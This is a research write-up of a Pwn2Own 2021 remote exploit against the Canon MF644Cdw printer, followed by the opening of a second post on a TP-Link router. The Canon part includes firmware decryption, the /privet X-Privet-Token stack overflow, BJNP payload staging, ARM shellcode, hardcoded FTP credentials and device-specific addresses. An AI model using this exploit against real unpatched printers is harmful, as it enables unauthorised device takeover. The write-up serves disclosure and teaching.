Before yesterdayDiary of a reverse-engineer

# Introduction

Pwn2Own Austin 2021 was announced in August 2021 and introduced new categories, including printers. Based on our previous experience with printers, we decided to go after one of the three models. Among those, the Canon ImageCLASS MF644Cdw seemed like the most interesting target: previous research was limited (mostly targeting Pixma inkjet printers). Based on this, we started analyzing the firmware before even having bought the printer.

Our team was composed of 3 members:

Note: This writeup is based on version 10.02 of the printer's firmware, the latest available at the time of Pwn2Own.

# Firmware extraction and analysis

The Canon website is interesting: you cannot download the firmware for a particular model without having a serial number which matches that model. This, as you might guess, is particularly annoying when you want to download a firmware for a model you do not own. Two options came to our mind:

• Finding a picture of the model in a review or listing,
• Finding a serial number of the same model on Shodan.

Thankfully, the MFC644cdw was reviewed in details by PCmag, and one of the pictures contained the serial number of the printer used for the review. This allowed us to download a firmware from the Canon USA website. The version available online at the time on that website was 06.03.

### Predicting firmware URLs

As a side note, once the serial number was obtained, we could download several version of the firmware, for different operating systems. For example, version 06.03 for macOS has the following filename: mac-mf644-a-fw-v0603-64.dmg and the associated download link is https://pdisp01.c-wss.com/gdl/WWUFORedirectSerialTarget.do?id=OTUwMzkyMzJk&cmp=ABR&lang=EN. As the URL implies, this page asks for the serial number and redirects you to the actual firmware if the serial is valid. In that case: https://gdlp01.c-wss.com/gds/5/0400006275/01/mac-mf644-a-fw-v0603-64.dmg.

Of course, the base64 encoded id in the first URL is interesting: once decoded, you get the (literal string) 95039232d, which in turn, is the hex representation of 40000627501, which is part of the actual firmware URL!

A few more examples led us to understand that the part of the URL with the single digit (/5/ in our case) is just the last digit of the next part of the URL's path (/0400006275/ in this example). We assume this is probably used for load balancing or another similar reason. Using this knowledge, we were able to download a lot of different firmware images for various models. We also found out that Canon pages for USA or Europe are not as current as the Japanese page which had version 09.01 at the time of writing.

However, all of them lag behind the reality: the latest firmware version was 10.02, which is actually retrieved by the printer's firmware update mechanism. https://gdlp01.c-wss.com/rmds/oi/fwupdate/mf640c_740c_lbp620c_660c/contents.xml gives us the actual up-to-date version.

### Firmware types

A small note about firmware "types". The update XML has 3 different entries per content kind:

<contents-information>
<content kind="bootable" value="1" deliveryCount="1" version="1003" base_url="http://pdisp01.c-wss.com/gdl/WWUFORedirectSerialTarget.do" >
<query arg="id" value="OTUwMzZkMDQ5" />
<query arg="cmp" value="Z03" />
<query arg="lang" value="JA" />
</content>
<content kind="bootable" value="2" deliveryCount="1" version="1003" base_url="http://pdisp01.c-wss.com/gdl/WWUFORedirectSerialTarget.do" >
<query arg="id" value="OTUwMzZkMGFk" />
<query arg="cmp" value="Z03" />
<query arg="lang" value="JA" />
</content>
<content kind="bootable" value="3" deliveryCount="1" version="1003" base_url="http://pdisp01.c-wss.com/gdl/WWUFORedirectSerialTarget.do" >
<query arg="id" value="OTUwMzZkMTEx" />
<query arg="cmp" value="Z03" />
<query arg="lang" value="JA" />
</content>


Which correspond to:

• gdl_MF640C_740C_LBP620C_660C_Series_MainController_TYPEA_V10.02.bin
• gdl_MF640C_740C_LBP620C_660C_Series_MainController_TYPEB_V10.02.bin
• gdl_MF640C_740C_LBP620C_660C_Series_MainController_TYPEC_V10.02.bin

Each type corresponds to one of the models listed in the XML URL:

• MF640C => TYPEA
• MF740C => TYPEB
• LBP620C => TYPEC

## Decryption: black box attempts

### Basic firmware extraction

Windows updates such as win-mf644-a-fw-v0603.exe are Zip SFX files, which contain the actual updater: mf644c_v0603_typea_w.exe. This is the end of the PE file as seen in Hiew:

004767F0:  58 50 41 44-44 49 4E 47-50 41 44 44-49 4E 47 58  XPADDINGPADDINGX
00072C00:  4E 43 46 57-00 00 00 00-3D 31 5D 08-20 00 00 00  NCFW    =1]


As you can see (the address changes from RVA to physical offset), the firmware update seems to be stored at the end of the PE as an overlay, and conveniently starts with a NCFW magic header. MacOS firmware updates can be extracted with 7z and contain a big file: mf644c_v0603_typea_m64.app/Contents/Resources/.USTBINDDATA which is almost the same as the Windows overlay except for the PE signature, and some offsets.

After looking at a bunch of firmware, it became clear that the footer of the update contains information about various parts of the firmware update, including a nice USTINFO.TXT file which describes the target model, etc. The NCFW magic also appears several times in the biggest "file" described by the UST footer. After some trial and error, its format was understood and allowed us to split the firmware into its basic components.

All this information was compiled into the unpack_fw.py script.

### Weak encryption, but how weak?

The main firmware file Bootable.bin.sig is encrypted, but it seems encrypted with a very simple algorithm, as we can determine by looking at the patterns:

00000040  20 21 22 23 24 25 26 27 28 29 2A 2B 2C 2D 2E 2F  !"#$%&'()*+,-./ 00000050 30 31 32 33 34 35 36 37 38 39 3A 3B 39 FC E8 7A 0123456789:;9..z 00000060 34 35 4F 50 44 45 46 37 48 49 CA 4B 4D 4E 4F 50 45OPDEF7HI.KMNOP 00000070 51 52 53 54 55 56 57 58 59 5A 5B 5C 5D 5E 5F 60 QRSTUVWXYZ[\]^_  The usual assumption of having big chunks of 00 or FF in the plaintext firmware allows us to have different hypothesis about the potential encryption algorithm. The increasing numbers most probably imply some sort of byte counter. We then tried to combine it with some basic operations and tried to decrypt: • A xor with a byte counter => fail • A xor with counter and feedback => fail Attempting to use a known plaintext (where the plaintext is not 00 or FF) was impossible at this stage as we did not have a decrypted firmware image yet. Having a reverser in the team, the obvious next step was to try to find code which implements the decryption: • The updater tool does not decrypt the firmware but sends it as-is => fail • Check the firmware of previous models to try to find unencrypted code which supports encrypted "NCFW" updates: • FAIL • However, we found unencrypted firmware files with a similar structure which gave use a bit of known plaintext, but did not give any real clue about the solution # Hardware: first look ## Main board and serial port Once we received the printer, we of course started dismantling it to look for interesting hardware features and ways to help us get access to the firmware. • Looking at the hardware we considered these different approaches to obtain more information: • An SPI is present on the mainboard, read it • An Unsolder eMMC is present on the mainboard, read it • Find an older model, with unencrypted firmware and simpler flash to unsolder, read, profit. Fortunately, we did not have to go further in this direction. • Some printers are known to have a serial port for debug providing a mini shell. Find one and use it to run debug commands in order to get plaintext/memory dump (NOTE of course we found the serial port afterwards) ## Service mode All enterprise printers have a service mode, intended for technicians to diagnose potential problems. YouTube is a good source of info on how to enter it. On this model, the dance is a bit weird as one must press "invisible" buttons. Once in service mode, debug logs can be dumped on a USB stick, which creates several files: • SUBLOG.TXT • SUBLOG.BIN is obviously SUBLOG.TXT, encrypted with an algorithm which exhibits the same patterns as the encrypted firmware. ## Decrypting firmware ### Program synthesis approach At this point, this was our train of thought: • The encryption algorithm seemed "trivial" (lots of patterns, byte by byte) • SUBLOG.TXT gave us lots of plaintext • We were too lazy to find it by blackbox/reasoning As program synthesis has evolved quite fast in the past years, we decided to try to get a tool to synthesize the decryption algorithm for us. We of course used the known plaintext from SUBLOG.TXT, which can be used as constraints. Rosette seemed easy to use and well suited, so we went with that. We started following a nice tutorial which worked over the integers, but gave us a bit of a headache when trying to directly convert it to bitvectors. However, we quickly realized that we didn't have to synthesize a program (for all inputs), but actually solve an equation where the unknown was the program which would satisfy all the constraints built using the known plaintext/ciphertext pairs. The "Essential" guide to Rosette covers this in an example for us. So we started by defining the "program" grammar and crypt function, which defines a program using the grammar, with two operands, up to 3 layers deep: (define int8? (bitvector 8)) (define (int8 i) (bv i int8?)) (define-grammar (fast-int8 x y) ; Grammar of int32 expressions over two inputs: [expr (choose x y (?? int8?) ; <expr> := x | y | <32-bit integer constant> | ((bop) (expr) (expr)) ; (<bop> <expr> <expr>) | ((uop) (expr)))] ; (<uop> <expr>) [bop (choose bvadd bvsub bvand ; <bop> := bvadd | bvsub | bvand | bvor bvxor bvshl ; bvor | bvxor | bvshl | bvlshr bvashr)] ; bvlshr | bvashr [uop (choose bvneg bvnot)]) ; <uop> := bvneg | bvnot (define (crypt x i) (fast-int8 x i #:depth 3))  Once this is done, we can define the constraints, based on the known plain/encrypted pairs and their position (byte counter i). And then we ask Rosette for an instance of the crypt program which satisfies the constraints: (define sol (solve (assert ; removing constraints speed things up (&& (bveq (crypt (int8 #x62) (int8 0)) (int8 #x3d)) ; [...] (bveq (crypt (int8 #x69) (int8 7)) (int8 #x3d)) (bveq (crypt (int8 #x06) (int8 #x16)) (int8 #x20)) (bveq (crypt (int8 #x5e) (int8 #x17)) (int8 #x73)) (bveq (crypt (int8 #x5e) (int8 #x18)) (int8 #x75)) (bveq (crypt (int8 #xe8) (int8 #x19)) (int8 #x62)) ; [...] (bveq (crypt (int8 #xc3) (int8 #xe0)) (int8 #x3a)) (bveq (crypt (int8 #xef) (int8 #xff)) (int8 #x20)) ) ) )) (print-forms sol)  After running racket rosette.rkt and waiting for a few minutes, we get the following output: (list 'define '(crypt x i) (list 'bvor (list 'bvlshr '(bvsub i x) (list 'bvadd (bv #x87 8) (bv #x80 8))) '(bvsub (bvadd i i) (bvadd x x))))  which is a valid decryption program ! But it's a bit untidy. So let's convert it to C, with a trivial simplification: uint8_t crypt(uint8_t i, uint8_t x) { uint8_t t = i-x; return (((2*t)&0xFF)|((t>>((0x87+0x80)&0xFF))&0xFF))&0xFF; }  and compile it with gcc -m32 -O2 using https://godbolt.org to get the optimized version: mov al, byte ptr [esp+4] sub al, byte ptr [esp+8] rol al ret  So our encryption algorithm was a trivial ror(x-i, 1)! ## Exploiting setup After we decrypted the firmware and noticed the serial port, we decided to set up an environment that would facilitate our exploitation of the vulnerability. We set up a Raspberry Pi on the same network as the printer that we also connected to the serial port of the printer. In this way we could remotely exploit the vulnerability while controlling the status of the printer via many features offered by the serial port. ## Serial port: dry shell The serial port gave us access to the aforementioned dry shell which provided incredible help to understand / control the printer status and debug it during our exploitation attempts. Among the many powerful features offered, here are the most useful ones: • The ability to perform a full memory dump: a simple and quick way to retrieve the updated firmware unencrypted. • The ability to perform basic filesystem operations. • The ability to list the running tasks and their associated memory segments. • The ability to start an FTP daemon, this will come handy later. • The ability to inspect the content of memory at a specific address. This feature was used a lot to understand what was going on during exploitation attempts. One of the annoying things is the presence of a watchdog which restarts the whole printer if the HTTP daemon crashes. We had to run this command quickly after any exploitation attempts. # Vulnerability ## Attack surface The Pwn2Own rules state that if there's authentication, it should be bypassed. Thus, the easiest way to win is to find a vulnerability in a non authenticated feature. This includes obvious things like: • Printing functions and protocols, • Various web pages, • The HTTP server, • The SNMP server. We started by enumerating the "regular" web pages that are handled by the web server (by checking the registered pages in the code), including the weird /elf/ subpages. We then realized some other URLs were available in the firmware, which were not obviously handled by the usual code: /privet/, which are used for cloud based printing. ## Vulnerable function Reverse engineering the firmware is rather straightforward, even if the binary is big. The CPU is standard ARMv7. By reversing the handlers, we quickly found the following function. Note that all names were added manually, either taken from debug logging strings or after reversing: int __fastcall ntpv_isXPrivetTokenValid(char *token) { int tklen; // r0 char *colon; // r1 char *v4; // r1 int timestamp; // r4 int v7; // r2 int v8; // r3 int lvl; // r1 int time_delta; // r0 const char *msg; // r2 char buffer[256]; // [sp+4h] [bp-174h] BYREF char str_to_hash[28]; // [sp+104h] [bp-74h] BYREF char sha1_res[24]; // [sp+120h] [bp-58h] BYREF int sha1_from_token[6]; // [sp+138h] [bp-40h] BYREF char last_part[12]; // [sp+150h] [bp-28h] BYREF int now; // [sp+15Ch] [bp-1Ch] BYREF int sha1len; // [sp+164h] [bp-14h] BYREF bzero(buffer, 0x100u); bzero(sha1_from_token, 0x18u); memset(last_part, 0, sizeof(last_part)); bzero(str_to_hash, 0x1Cu); bzero(sha1_res, 0x18u); sha1len = 20; if ( ischeckXPrivetToken() ) { tklen = strlen(token); base64decode(token, tklen, buffer); colon = strtok(buffer, ":"); if ( colon ) { strncpy(sha1_from_token, colon, 20); v4 = strtok(0, ":"); if ( v4 ) strncpy(last_part, v4, 10); } sprintf_0(str_to_hash, "%s%s%s", x_privet_secret, ":", last_part); if ( sha1(str_to_hash, 28, sha1_res, &sha1len) ) { sha1_res[20] = 0; if ( !strcmp_0((unsigned int)sha1_from_token, sha1_res, 0x14u) ) { timestamp = strtol2(last_part); time(&now, 0, v7, v8); lvl = 86400; time_delta = now - LODWORD(qword_470B80E0[0]) - timestamp; if ( time_delta <= 86400 ) { msg = "[NTPV] %s: x-privet-token is valid.\n"; lvl = 5; } else { msg = "[NTPV] %s: issue_timecounter is expired!!\n"; } if ( time_delta <= 86400 ) { log(3661, lvl, msg, "ntpv_isXPrivetTokenValid"); return 1; } log(3661, 5, msg, "ntpv_isXPrivetTokenValid"); } else { log(3661, 5, "[NTPV] %s: SHA1 hash value is invalid!!\n", "ntpv_isXPrivetTokenValid"); } } else { log(3661, 3, "[NTPV] ERROR %s fail to generate hash string.\n", "ntpv_isXPrivetTokenValid"); } return 0; } log(3661, 6, "[NTPV] %s() DEBUG MODE: Don't check X-Privet-Token.", "ntpv_isXPrivetTokenValid"); return 1; }  The vulnerable code is the following line: base64decode(token, tklen, buffer);  With some thought, one can recognize the bug from the function signature itself -- there is no buffer length parameter passed in, meaning base64decode has no knowledge of buffer bounds. In this case, it decodes the base64-encoded value of the X-Privet-Token header into the local, stack based buffer which is 256 bytes long. The header is attacker-controlled is limited only by HTTP constraints, and as a result can be much larger. This leads to a textbook stack-based buffer overflow. The stack frame is relatively simple: -00000178 var_178 DCD ? -00000174 buffer DCB 256 dup(?) -00000074 str_to_hash DCB 28 dup(?) -00000058 sha1_res DCB 20 dup(?) -00000044 var_44 DCD ? -00000040 sha1_from_token DCB 24 dup(?) -00000028 last_part DCB 12 dup(?) -0000001C now DCD ? -00000018 DCB ? ; undefined -00000017 DCB ? ; undefined -00000016 DCB ? ; undefined -00000015 DCB ? ; undefined -00000014 sha1len DCD ? -00000010 -00000010 ; end of stack variables  The buffer array is not really far from the stored return address, so exploitation should be relatively easy. Initially, we found the call to the vulnerable function in the /privet/printer/createjob URL handler, which is not accessible before authenticating, so we had to dig a bit more. ## ntpv functions The various ntpv URLs and handlers are nicely defined in two different arrays of structures as you can see below: privet_url nptv_urls[8] = { { 0, "/privet/info", "GET" }, { 1, "/privet/register", "POST" }, { 2, "/privet/accesstoken", "GET" }, { 3, "/privet/capabilities", "GET" }, { 4, "/privet/printer/createjob", "POST" }, { 5, "/privet/printer/submitdoc", "POST" }, { 6, "/privet/printer/jobstate", "GET" }, { 7, NULL, NULL } };  DATA:45C91C0C nptv_cmds id_cmd <0, ntpv_procInfo> DATA:45C91C0C ; DATA XREF: ntpv_cgiMain+338↑o DATA:45C91C0C ; ntpv_cgiMain:ntpv_cmds↑o DATA:45C91C0C id_cmd <1, ntpv_procRegister> DATA:45C91C0C id_cmd <2, ntpv_procAccesstoken> DATA:45C91C0C id_cmd <3, ntpv_procCapabilities> DATA:45C91C0C id_cmd <4, ntpv_procCreatejob> DATA:45C91C0C id_cmd <5, ntpv_procSubmitdoc> DATA:45C91C0C id_cmd <6, ntpv_procJobstate> DATA:45C91C0C id_cmd <7, 0>  After reading the documentation and reversing the code, it appeared that the register URL was accessible without authentication and called the vulnerable code. # Exploitation ## Triggering the bug Using a pattern generated with rsbkb, we were able to get the following crash on the serial port: Dry> < Error Exception > CORE : 0 TYPE : prefetch ISR : FALSE TASK ID : 269 TASK Name : AsC2 R 0 : 00000000 R 1 : 00000000 R 2 : 40ec49fc R 3 : 49789eb4 R 4 : 316f4130 R 5 : 41326f41 R 6 : 6f41336f R 7 : 49c1b38c R 8 : 49d0c958 R 9 : 00000000 R10 : 00000194 R11 : 45c91bc8 R12 : 00000000 R13 : 4978a030 R14 : 4167a1f4 PC : 356f4134 PSR : 60000013 CTRL : 00c5187d IE(31)=0  Which gives: $ rsbkb bofpattoff 4Ao5
Offset: 434 (mod 20280) / 0x1b2


Astute readers will note that the offset is too big compared to the local stack frame size, which is only 0x178 bytes. Indeed, the correct offset for PC, from the start of the local buffer is 0x174. The 0x1B2 which we found using the buffer overflow pattern actually triggers a crash elsewhere and makes exploitation way harder. So remember to always check if your offsets make sense.

## Buffer overflow

As the firmware is lacking protections such as stack cookies, NX, and ASLR, exploiting the buffer overflow should be rather straightforward, despite the printer running DRYOS which differs from usual operating systems. Using the information gathered while researching the vulnerability, we built the following class to exploit the vulnerability and overwrite the PC register with an arbitrary address:

import struct

@property
def r4(self):
return b"\x44\x44\x44\x44"

@property
def r5(self):
return b"\x55\x55\x55\x55"

@property
def r6(self):
return b"\x66\x66\x66\x66"

@property
def pc(self):

def __bytes__(self):
return (
b":" * 0x160
+ struct.pack("<I", 0x20)  # pHashStrBufLen
+ self.r4
+ self.r5
+ self.r6
+ self.pc
)


The vulnerability can then be triggered with the following code, assuming the printer's IP address is 192.168.1.100:

import base64
import http.client

"Content-type": "application/json",
"Accept": "text/plain",
}

conn = http.client.HTTPConnection("192.168.1.100", 80)


To confirm that the exploit was extremely reliable, we simply jumped to a debug function's entry point (which printed information to the serial console) and observed it worked consistently — though the printer rebooted afterwards because we hadn't cleaned the stack.

With this out of the way, we now need to work on writing a useful exploit. After reaching out to the organizers to learn more about their expectations regarding the proof of exploitation, we decided to show a custom image on the printer's LCD screen.

To do so, we could basically:

• Store our exploit in the buffer used to trigger the overflow and jump into it,
• Find another buffer we controlled and jump into it,
• Rely only on return-oriented programming.

Though the first method would have been possible (we found a convenient add r3, r3, #0x103 ; bx r3 gadget), we were limited by the size of the buffer itself, even more so because parts of it were being rewritten in the function's body. Thus, we decided to look into the second option by checking other protocols supported by the printer.

## BJNP

One of the supported protocols is BJNP, which was conveniently exploited by Synacktiv ninjas on a different printer, accessible on UDP port 8611. This project adds a BJNP backend for CUPS, and the protocol itself is also handled by Wireshark.

In our case, BJNP is very useful: it can handle sessions and allows the client to store data (up to 0x180 bytes) on the printer for the duration of the session, which means we can precisely control until when our payload will remain available in memory. Moreover, this data is stored in the field of a global structure, which means it is always located at the same address for a given firmware. For the sake of our exploit, we reimplemented parts of the protocol using Scapy:

from scapy.packet import Packet
from scapy.fields import (
EnumField,
ShortField,
StrLenField,
BitEnumField,
FieldLenField,
StrFixedLenField,
)

class BJNPPkt(Packet):
name = "BJNP Packet"

BJNP_DEVICE_ENUM = {
0x0: "Client",
0x1: "Printer",
0x2: "Scanner",
}

BJNP_COMMAND_ENUM = {
0x000: "GetPortConfig",
0x201: "GetNICInfo",
0x202: "NICCmd",
0x210: "SessionStart",
0x211: "SessionEnd",
0x212: "GetSessionInfo",
0x221: "DataWrite",
0x230: "GetDeviceID",
0x232: "CmdNotify",
0x240: "AppCmd",
}

BJNP_ERROR_ENUM = {
0x8300: "Session error",
}

fields_desc = [
StrFixedLenField("magic", default=b"MFNP", length=4),
BitEnumField("device", default=0, size=1, enum=BJNP_DEVICE_ENUM),
BitEnumField("cmd", default=0, size=15, enum=BJNP_COMMAND_ENUM),
EnumField("err_no", default=0, enum=BJNP_ERROR_ENUM, fmt="!H"),
ShortField("seq_no", default=0),
ShortField("sess_id", default=0),
FieldLenField("body_len", default=None, length_of="body", fmt="!I"),
StrLenField("body", b"", length_from=lambda pkt: pkt.body_len),
]


For our version of the firmware, the BJNP structure is located at 0x46F2B294 and the session data sent by the client is stored at offset 0x24. We also want our payload to run in thumb mode to reduce its size, which means we need to jump to an odd address. All in all, we can simply overwrite the pc register with 0x46F2B294+0x24+1=0x46F2B2B9 in our original payload to reach the BJNP session buffer.

## Initial PoC

Quick recap of the exploitation strategy:

• Start a BJNP session and store our exploit in the session data,
• Exploit the buffer overflow to jump in the session buffer,
• Close the BJNP session to remove our exploit from memory once it ran.

To demonstrate this, we can jump to the function which disables the energy save mode on the printer (and wakes the screen up, which is useful to check if it actually worked). In our firmware, it is located at 0x413054D8, and we simply need to set the r0 register to 0 before calling it:

mov r0, #0
mov r12, #0x54D8
movt r12, #0x4130
blx r12


To avoid the printer rebooting, we can also fix the r0 and lr registers to restore the original flow:

mov r0, #0
mov r1, #0xEBA0
movt r1, #0x40DE
mov lr, r1
bx lr


Putting it all together, here is an exploit which does just that:

import time
import socket
import base64
import http.client

)

pkt = BJNPPkt(
cmd=0x210,
seq_no=0,
sess_id=1,
)
pkt.show2()
sock.sendall(bytes(pkt))

res = BJNPPkt(sock.recv(4096))
res.show2()

# The printer should return a valid session ID
assert res.sess_id != 0, ValueError("Failed to create session")

pkt = BJNPPkt(
cmd=0x211,
seq_no=0,
sess_id=1,
)
pkt.show2()
sock.sendall(bytes(pkt))

res = BJNPPkt(sock.recv(4096))
res.show2()

sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.connect(("192.168.1.100", 8610))

"Content-type": "application/json",
"Accept": "text/plain",
}

conn = http.client.HTTPConnection("192.168.1.100", 80)

time.sleep(5)

sock.close()


We can now build upon this PoC to create a meaningful payload. As we want to display a custom image on screen, we need to:

• Find a way of uploading the image data (as we're limited to 0x180 bytes in total in the BJNP session buffer),
• Make sure the screen is turned on (for example, by disabling the energy save mode as above),
• Call the display function with our image data to show it on screen.

## Displaying an image

As the firmware contains a number of debug functions, we were able to understand the display mechanism rather quickly. There is a function able to write an image into the frame buffer (located at 0x41305158 in our firmware) which takes two arguments: the address of an RGB image, and the address of a frame buffer structure which looks like below:

struct frame_buffer_struct {
unsigned short x;
unsigned short y;
unsigned short width;
unsigned short height;
};


The frame buffer can only be used to display 320x240 pixels at a time which isn't enough to cover the whole screen as it is 800x480 pixels. We push this structure on the stack with the following code:

sub sp, #8
mov r0, #320
strh r0, [sp, #4]  ; width
mov r0, #240
strh r0, [sp, #6]  ; height
mov r0, #0
strh r0, [sp]      ; x
strh r0, [sp, #2]  ; y


Once this is done, assuming r5 contains the address of our image buffer, we display it on screen with the following code:

; Display frame buffer
mov r1, r5         ; Image buffer
mov r0, sp         ; Frame buffer struct
mov r12, #0x5158
movt r12, #0x4130
blx r12


This leaves the question of the image buffer itself.

## FTP

Though we thought of multiple options to upload the image, we ended up deciding to use a legitimate feature of the printer: it can serve as an FTP server, which is disabled by default. Thus, we need to:

• Enable the ftpd service,
• Upload our image from the client,
• Read the image in a buffer.

In our firmware, the function to enable the ftpd service is located at 0x4185F664 and takes 4 arguments: the maximum number of simultaneous client, the timeout, the command port, and the data port. It can be enabled with the following payload:

mov r0, #0x3       ; Max clients
mov r1, #0x0       ; Timeout
mov r2, #21        ; Command port
mov r3, #20        ; Data port
mov r12, #0xF664
movt r12, #0x4185
blx r12


The ftpd service also has a feature to change directory. This doesn't really matter to us since the default directory is always S:/. We could however decide to change it to: either access data stored on other paths (e.g. the admin password) or to ensure our exploit works correctly even if the directory was somehow changed beforehand. To do so, we would need to call the function at 0x4185E2A4 with the r0 register set to the address of the new path string.

Once enabled, the FTP server requires credentials to connect. Fortunately for us, they are hardcoded in the firmware as guest / welcome.. We can upload our image (called a in this example) with the following code:

import ftplib

with ftplib.FTP(host="192.168.1.100", user="guest", passwd="welcome.") as ftp:
with open("image.raw") as f:
ftp.storbinary("STOR a", f)


## File system

We are simply left with reading the image from the filesystem. Thankfully, DRYOS has an abstraction layer to handle this, allowing us to only look for the equivalent of the usual open, read, and close functions. In our firmware, they are located respectively at 0x416917C8, 0x41691A20, and 0x41691878. Assuming r5 contains the address of our image path, we can open the file like so:

mov r2, #0x1C0
mov r1, #0
mov r0, r5         ; Image path
mov r12, #0x17C8
movt r12, #0x4169
blx r12
mov r5, r0         ; File handle

; Exit if there was an error opening the file
cmp r5, #0
ble .end


The image being too large to store on the stack, we could decide to dynamically allocate a buffer. However, the firmware contains debug images stored in writable memory, so we decided to overwrite one of them instead to simplify the exploit. We went with 0x436A3F64, which originally contains a screenshot of a calculator.

Here is the payload to read the content of the file into this buffer:

; Get address of image buffer
mov r10, #0x3F64
movt r10, #0x436A

; Compute image size
mov r2, #320       ; Width
mov r3, #240       ; Height
mov r6, #3         ; Depth
mul r6, r6, r2
mul r6, r6, r3

; Read content of file in buffer
mov r3, #0         ; Bytes read
mov r4, r6         ; Bytes left to read
.loop:
mov r2, r4         ; Number of bytes to read
add r1, r10, r3    ; Buffer position
mov r0, r5         ; File handle
mov r12, #0x1A20
movt r12, #0x4169
blx r12
cmp r0, #0
ble .end_read      ; Exit in case of an error
sub r4, r4, r0
cmp r4, #0
bgt .loop


For completeness, here is how to close the file:

mov r0, r5
mov r12, #0x1878
movt r12, #0x4169
blx r12


## Putting everything together

In the end, our exploit is split into 3 parts:

1. Execute a first payload to enable the ftpd service and change to the S:/ directory,
2. Upload our image using FTP,
3. Exploit the vulnerability with another payload reading the image and displaying it on the screen.

You can find the script handling all this in the exploit.zip and you can see the exploit in action here.

It feels a bit... Anticlimactic? Where is the Doom port for DRYOS when you need it...

# Patch

Canon published an advisory in March 2022 alongside a firmware update.

A quick look at this new version shows that the /privet endpoint is no longer reachable: the function registering this path now logs a message before simply exiting, and the /privet string no longer appears in the binary. Despite this, it seems like the vulnerable code itself is still there - though it is now supposedly unreachable. Strings related to FTP have also been removed, hinting that Canon may have disabled this feature as well.

As a side note, disabling this feature makes sense since Google Cloud Print was discontinued on December 31, 2020, and Canon announced they no longer supported it as of January 1, 2021.

# Conclusion

In the end, we achieved a perfectly reliable exploit for our printer. It should be noted that our whole work was based on the European version of the printer, while the American version was used during the contest, so a bit of uncertainty still remained on the d-day. Fortunately, we had checked that the firmware of both versions matched beforehand.

We also adapted the offsets in our exploit to handle versions 9.01, 10.02, and 10.03 (released during the competition) in case the organizers' printer was updated. To do so, we built a script to automatically find the required offsets in the firmware and update our exploit.

All in all, we were able to remotely display an image of our choosing on the printer's LCD screen, which counted as a success and earned us 2 Master of Pwn points.

# Competing in Pwn2Own 2021 Austin: Icarus at the Zenith

26 March 2022 at 15:00

# Introduction

In 2021, I finally spent some time looking at a consumer router I had been using for years. It started as a weekend project to look at something a bit different from what I was used to. On top of that, it was also a good occasion to play with new tools, learn new things.

I downloaded Ghidra, grabbed a firmware update and started to reverse-engineer various MIPS binaries that were running on my NETGEAR DGND3700v2 device. I quickly was pretty horrified with what I found and wrote Longue vue 🔭 over the weekend which was a lot of fun (maybe a story for next time?). The security was such a joke that I threw the router away the next day and ordered a new one. I just couldn't believe this had been sitting in my network for several years. Ugh 😞.

Anyways, I eventually received a brand new TP-Link router and started to look into that as well. I was pleased to see that code quality was much better and I was slowly grinding through the code after work. Eventually, in May 2021, the Pwn2Own 2021 Austin contest was announced where routers, printers and phones were available targets. Exciting. Participating in that kind of competition has always been on my TODO list and I convinced myself for the longest time that I didn't have what it takes to participate 😅.

This time was different though. I decided I would commit and invest the time to focus on a target and see what happens. It couldn't hurt. On top of that, a few friends of mine were also interested and motivated to break some code, so that's what we did. In this blogpost, I'll walk you through the journey to prepare and enter the competition with the mofoffensive team.

# Target selections

At this point, @pwning_me, @chillbro4201 and I are motivated and chatting hard on discord. The end goal for us is to participate to the contest and after taking a look at the contest's rules, the path of least resistance seems to be targeting a router. We had a bit more experience with them, the hardware was easy and cheap to get so it felt like the right choice.

At least, that's what we thought was the path of least resistance. After attending the contest, maybe printers were at least as soft but with a higher payout. But whatever, we weren't in it for the money so we focused on the router category and stuck with it.

Out of the 5 candidates, we decided to focus on the consumer devices because we assumed they would be softer. On top of that, I had a little bit of experience looking at TP-Link, and somebody in the group was familiar with NETGEAR routers. So those were the two targets we chose, and off we went: logged on Amazon and ordered the hardware to get started. That was exciting.

The TP-Link AC1750 Smart Wi-Fi router arrived at my place and I started to get going. But where to start? Well, the best thing to do in those situations is to get a root shell on the device. It doesn't really matter how you get it, you just want one to be able to figure out what are the interesting attack surfaces to look at.

As mentioned in the introduction, while playing with my own TP-Link router in the months prior to this I had found a post auth vulnerability that allowed me to execute shell commands. Although this was useless from an attacker perspective, it would be useful to get a shell on the device and bootstrap the research. Unfortunately, the target wasn't vulnerable and so I needed to find another way.

Oh also. Fun fact: I actually initially ordered the wrong router. It turns out TP-Link sells two line of products that look very similar: the A7 and the C7. I bought the former but needed the latter for the contest, yikers 🤦🏽‍♂️. Special thanks to Cody for letting me know 😅!

# Getting a shell on the target

After reverse-engineering the web server for a few days, looking for low hanging fruits and not finding any, I realized that I needed to find another way to get a shell on the device.

After googling a bit, I found an article written by my countrymen: Pwn2own Tokyo 2020: Defeating the TP-Link AC1750 by @0xMitsurugi and @swapg. The article described how they compromised the router at Pwn2Own Tokyo in 2020 but it also described how they got a shell on the device, great 🙏🏽. The issue is that I really have no hardware experience whatsoever. None.

But fortunately, I have pretty cool friends. I pinged my boy @bsmtiam, he recommended to order a FT232 USB cable and so I did. I received the hardware shortly after and swung by his place. He took apart the router, put it on a bench and started to get to work.

After a few tries, he successfully soldered the UART. We hooked up the FT232 USB Cable to the router board and plugged it into my laptop:

Using Python and the minicom library, we were finally able to drop into an interactive root shell 💥:

Amazing. To celebrate this small victory, we went off to grab a burger and a beer 🍻 at the local pub. Good day, this day.

# Enumerating the attack surfaces

It was time for me to figure out which areas I should try to focus my time on. I did a bunch of reading as this router has been targeted multiple times over the years at Pwn2Own. I figured it might be a good thing to try to break new grounds to lower the chance of entering the competition with a duplicate and also maximize my chances at finding something that would allow me to enter the competition. Before thinking about duplicates, I need a bug.

I started to do some very basic attack surface enumeration: processes running, iptable rules, sockets listening, crontable, etc. Nothing fancy.

# ./busybox-mips netstat -platue
Active Internet connections (servers and established)
tcp        0      0 0.0.0.0:33344           0.0.0.0:*               LISTEN      -
tcp        0      0 localhost:20002         0.0.0.0:*               LISTEN      4877/tmpServer
tcp        0      0 0.0.0.0:20005           0.0.0.0:*               LISTEN      -
tcp        0      0 0.0.0.0:www             0.0.0.0:*               LISTEN      4940/uhttpd
tcp        0      0 0.0.0.0:domain          0.0.0.0:*               LISTEN      4377/dnsmasq
tcp        0      0 0.0.0.0:ssh             0.0.0.0:*               LISTEN      5075/dropbear
tcp        0      0 0.0.0.0:https           0.0.0.0:*               LISTEN      4940/uhttpd
tcp        0      0 :::domain               :::*                    LISTEN      4377/dnsmasq
tcp        0      0 :::ssh                  :::*                    LISTEN      5075/dropbear
udp        0      0 0.0.0.0:20002           0.0.0.0:*                           4878/tdpServer
udp        0      0 0.0.0.0:domain          0.0.0.0:*                           4377/dnsmasq
